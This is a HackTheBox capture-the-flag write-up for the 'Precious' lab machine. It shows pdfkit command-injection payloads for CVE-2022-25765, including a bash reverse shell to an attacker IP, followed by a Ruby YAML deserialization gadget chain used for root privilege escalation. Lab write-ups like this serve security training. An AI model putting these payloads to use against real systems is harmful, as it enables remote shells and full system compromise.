CTF-Writeups/HackTheBox/Precious.md
2023-05-26 04:17:11 +03:00

3.5 KiB

HackTheBox - Precious

NMAP

Nmap scan report for 10.10.11.189
Host is up (1.5s latency).
Not shown: 63496 closed tcp ports (reset), 2037 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT 80 (HTTP)

Visting the web server, it redirects to precious.htb

Adding the domain in /etc/hosts file

It says about entering a url which will convert it into a pdf file, on trying http://localhost and http://127.0.0.1 it doesn't allow them

Trying a remote url did worked

Foothold

Running exiftool on the generated pdf, we'll see the version of pdfkit

Which reveals that there exists a CVE-2022-25765 and it's vulnerable to command injection

Following the commits being made on pdfkit and snyk, it needs http:// at the begninig and the with back ticks we can can include shell comamnd

http://%20`ping 10.10.14.72`
http://%20`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.72/4444 0>&1"`

Running pspy doesn't show anything interesting

Privilege Escalation (henry)

Going into ruby's home directory, we can see .bundle foldder which has henry's password

Doing sudo -l we can see this user can run `/opt/update_dependencies.rb file as root user

This script will read try to read `dependency.yaml` file and will compare `yaml` and `pdfkit` it's version

Since it's reading yaml, this can absued with yaml deserilization and it's vulnerable because of yaml.load

- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: id
         method_id: :resolve

References